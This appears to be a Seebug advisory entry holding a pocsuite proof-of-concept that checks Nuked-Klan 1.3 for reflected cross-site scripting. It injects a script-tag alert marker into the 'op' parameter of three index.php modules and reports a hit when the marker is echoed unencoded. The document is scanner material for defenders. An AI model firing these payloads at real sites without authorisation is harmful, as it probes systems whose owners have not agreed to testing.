Nuked-Klan 1.3 - Multiple Cross Site Scripting Vulnerabilities

2014-07-01T00:00:00
ID SSV:76085
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


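class TestPOC(POCBase):
    """Detection check for the reflected XSS in Nuked-Klan 1.3 (SSV-76085).

    The check requests three ``index.php`` modules (Team, News, Liens) with a
    script marker in the ``op`` parameter and reports the target as affected
    when the marker comes back unmodified in the response body.

    Reading the result:
      * A hit shows that ``op`` is echoed without HTML encoding. It does not
        show which markup context the value lands in, so confirm by hand
        before filing the finding.
      * A miss only means the marker was not echoed verbatim by these three
        modules; it is not evidence that the installation is patched.

    Application-side fix: HTML-encode ``op`` wherever it is written into the
    page, and reject values outside the operations the module supports.
    """

    vulID = '76085'  # ssvid
    version = '1.0'
    author = ['Disorder']
    vulDate = '2003-12-31'
    createDate = '2016-1-8'
    updateDate = '2016-1-8'
    references = ['http://www.sebug.net/vuldb/ssvid-76085']
    name = 'Nuked-Klan 1.3 - Multiple Cross Site Scripting Vulnerabilities'
    appPowerLink = 'http://sourceforge.net/projects/nukedklan/'
    appName = 'Nuked-Klan'
    appVersion = '1.3'
    # NOTE(review): the advisory is a cross-site scripting issue; 'Other'
    # hides that in reports. Confirm the framework's label for XSS and use it.
    vulType = 'Other'
    desc = '''
    Nuked-Klan 1.3 - Multiple Cross Site Scripting Vulnerabilities
    '''
    samples = ['']

    def _verify(self):
        """Probe each affected module and report the first one that reflects.

        Returns:
            The ``Output`` object built by ``parse_res``: success with the
            probed URL under ``VerifyInfo``, or failure if no module echoed
            the marker.
        """
        # One definition of the marker, used for both the request and the
        # match, so the two can never drift apart.
        marker = '<script>alert(/SeBUg/);</script>'
        # ``.content`` is a byte string; comparing against encoded bytes keeps
        # the membership test valid on Python 3 as well as Python 2.
        marker_bytes = marker.encode('utf-8')
        module_paths = (
            'index.php?file=Team&op=',
            'index.php?file=News&op=',
            'index.php?file=Liens&op=',
        )
        # Normalise the base so a target given without a trailing slash does
        # not produce a malformed URL such as "http://hostindex.php?...".
        base_url = self.url.rstrip('/') + '/'

        result = {}
        for path in module_paths:
            vul_url = '%s%s%s' % (base_url, path, marker)
            body = req.get(vul_url, timeout=10).content
            # A verbatim echo means the value was not HTML-encoded on output.
            if marker_bytes in body:
                result['VerifyInfo'] = {'URL': vul_url}
                break  # one reflecting module is enough to flag the target
        return self.parse_res(result)

    def _attack(self):
        """Run the same read-only reflection check as ``_verify``."""
        return self._verify()

    def parse_res(self, result):
        """Wrap *result* in an ``Output``: success if non-empty, else failure.

        Args:
            result: dict produced by ``_verify``; empty when nothing matched.

        Returns:
            The populated ``Output`` instance.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            # The original message said "Remote File Inclusion Failed", which
            # mislabels this XSS check in scan logs.
            output.fail('Reflected XSS marker not found in response')
        return output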

# Pass the check class to pocsuite's register(); presumably this is how the
# framework discovers and runs it (register is defined in pocsuite.utils,
# outside this file).
register(TestPOC)